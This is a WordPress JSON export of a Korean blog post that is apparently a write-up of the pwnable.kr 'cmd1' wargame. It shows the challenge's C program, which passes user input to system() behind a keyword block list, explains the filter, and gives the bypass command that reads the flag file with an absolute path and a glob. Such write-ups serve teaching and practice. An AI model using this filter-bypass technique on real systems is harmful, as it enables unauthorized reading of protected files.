{"id":247,"date":"2023-06-17T11:42:52","date_gmt":"2023-06-17T02:42:52","guid":{"rendered":"https:\/\/h4ck.kr\/?p=247"},"modified":"2024-05-22T17:08:34","modified_gmt":"2024-05-22T08:08:34","slug":"cmd1","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=247","title":{"rendered":"cmd1"},"content":{"rendered":"\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;string.h>\n\nint filter(char* cmd){\n\tint r=0;\n\tr += strstr(cmd, \"flag\")!=0;\n\tr += strstr(cmd, \"sh\")!=0;\n\tr += strstr(cmd, \"tmp\")!=0;\n\treturn r;\n}\nint main(int argc, char* argv[], char** envp){\n\tputenv(\"PATH=\/thankyouverymuch\");\n\tif(filter(argv[1])) return 0;\n\tsystem( argv[1] );\n\treturn 0;\n}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\ud480\uc774<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">putenv(\"PATH=\/thankyouverymuch\");<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">PATH\ub77c\ub294 \uc2e4\ud589 \ud30c\uc77c \ud0d0\uc0c9 \uacbd\ub85c\uc778 \ud658\uacbd\ubcc0\uc218\uc5d0 \uc788\ub294 \uac12\uc744 \/thankyouverymuch\ub85c \ubcc0\uacbd\ud55c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ub530\ub77c\uc11c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ud0ac\ub54c \uc808\ub300 \uacbd\ub85c\ub85c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ucf1c\uc57c \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int filter(char* cmd){\n\tint r=0;\n\tr += strstr(cmd, \"flag\")!=0;\n\tr += strstr(cmd, \"sh\")!=0;\n\tr += strstr(cmd, \"tmp\")!=0;\n\treturn r;\n}\n...\nif(filter(argv[1])) return 0;<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">filter \ud568\uc218\uc5d0 argv[1]\uc774 flag, sh, tmp \uc774 \uc14b\uc911\uc5d0 \ud558\ub098\ub77c\ub3c4 \ud0a4\uc6cc\ub4dc\uac00 \ub4e4\uc5b4\uac08 \uc2dc 0\uc744 \ubc14\ub85c \ubc18\ud658\uc2dc\ucf1c \ud504\ub85c\uadf8\ub7a8\uc744 \uc885\ub8cc\ud574\ubc84\ub9b0\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">system( argv[1] );<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">filter \ud568\uc218\ub97c \ubb34\uc0ac\ud788 \ud1b5\uacfc\ud558\uba74, system \ud568\uc218\ub97c \ud1b5\ud574 \uba85\ub839\uc5b4\ub97c \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"bat\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cmd1@pwnable:~$ .\/cmd1 \"\/bin\/cat \/home\/cmd1\/fla*\"\nmommy now I get what PATH environment is for :)<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\ud480\uc774 PATH\ub77c\ub294 \uc2e4\ud589 \ud30c\uc77c \ud0d0\uc0c9 \uacbd\ub85c\uc778 \ud658\uacbd\ubcc0\uc218\uc5d0 \uc788\ub294 \uac12\uc744 \/thankyouverymuch\ub85c \ubcc0\uacbd\ud55c\ub2e4. \ub530\ub77c\uc11c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ud0ac\ub54c \uc808\ub300 \uacbd\ub85c\ub85c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ucf1c\uc57c \ub420 \uac83\uc774\ub2e4. filter \ud568\uc218\uc5d0 argv[1]\uc774 flag, sh, tmp \uc774 \uc14b\uc911\uc5d0 \ud558\ub098\ub77c\ub3c4 \ud0a4\uc6cc\ub4dc\uac00 \ub4e4\uc5b4\uac08 \uc2dc 0\uc744 \ubc14\ub85c \ubc18\ud658\uc2dc\ucf1c \ud504\ub85c\uadf8\ub7a8\uc744 \uc885\ub8cc\ud574\ubc84\ub9b0\ub2e4. filter \ud568\uc218\ub97c \ubb34\uc0ac\ud788 \ud1b5\uacfc\ud558\uba74, system \ud568\uc218\ub97c \ud1b5\ud574 \uba85\ub839\uc5b4\ub97c \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\uac8c \ub41c\ub2e4.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[25],"class_list":["post-247","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=247"}],"version-history":[{"count":5,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions"}],"predecessor-version":[{"id":295,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions\/295"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}